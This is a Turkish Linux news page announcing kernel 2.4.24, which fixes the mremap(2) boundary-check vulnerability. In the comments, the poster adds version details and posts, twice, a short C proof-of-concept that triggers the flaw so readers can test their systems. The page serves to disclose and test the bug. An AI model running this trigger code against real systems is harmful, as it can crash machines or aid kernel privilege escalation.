Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Linuz balığı. Linux´cular bu tam size göre...
BatoR
26 Haziran 2002, 1 dakika okuma süresi

Şöyle düşünün : Arabanız var, sakin sakin yol alıyorsunuz, yoldan geçenler arabanıza bakıyor; hayranlık, şaşkınlık... Dahası mı?
www.thinkgeek.com :O)

Mandriva Linux Limited Edition 2005
darkhunter
14 Nisan 2005, 1 dakika okuma süresi

Mandriva ilk meyvesini verdi. Önümüzdeki günlerde halka da açılması beklenen Mandriva Linux'un temel özellikleri şöyle :
- Linux kernel 2.6.11.6
- KDE 3.3.2 (with some backports from version 3.4, including kpdf)
- GNOME 2.8.3
- Firefox 1.0.2
- GCC 3.4.3
- The GIMP 2.2
- Cdrecord 2.01.01a21 (with DVD+R dual-layer support)
- OpenOffice.org 1.1.4
- MySQL 4.1.11

Üniversiteleri Linux yarışması heyecanı sardı
adervis
12 Mayıs 2003, 1 dakika okuma süresi

Üniversite öğrencileri, ders dönemlerini bitirme telaşı ile Linux dünyasında kendilerini gösterme heyecanını aynı anda yaşıyorlar. Geçtiğimiz yıl ilk olarak düzenlenmesine rağmen üniversiteliler arasında büyük bir ilgi gören ve yoğun katılıma sahne olan Linux Başarı Ödülleri'nin ikincisi başladı. 1 Mayıs tarihinde duyurularak yarışma takvimi başlatılan Linux Başarı Ödülleri 2003'ü kazananlar 15 Ekim'de düzenlenecek ödül töreniyle kamuoyuna açıklanacak. IBM Türk'ün "UNİPROJE" Ekibinin düzenlediği Linux Başarı Ödülleri 2003 yarışması, Linux Kullanıcıları Derneği tarafından Yıldız Teknik Üniversitesi'nde düzenlenen Linux Şenliği'nde duyuruldu.

HEV Kemerköy Okulları Linux Eğitimlerine başladı
erol
21 Şubat 2002, 1 dakika okuma süresi

SuSE Linux'un Türkiye dağıtımcısı olan HEV Kemerköy Okulları SuSE tabanlı Linux eğitimleri vermeye başladı. Şu anda 6 farklı eğitim seçeneği sunan okul ileride LPI sınavlarını da desteklemeyi planlıyor. Daha fazla bilgi için www.kemerkoy.k12.tr/suse/

Microsoft Windows: Insecure by Design
DJENGIN
10 Kasım 2003, 1 dakika okuma süresi

Washington Post´ta yayınlanan “Microsoft Windows: Insecure by Design” başlıklı makalesinde Pegoraro, alternatif işletim sistemleri Mac OS X ve Linux’un daha korumalı olduğunu belirtirken Microsoft firmasının virüs koruma stratejilerini eleştiriyor. Kısa bir süre önce dünya çapında milyonlarca kullanıcı So.Big virüsü saldırısını yaşadı. E-posta kutuları şişerken internet trafiği yavaşladı, anonim e-postalar kutuları doldurdu.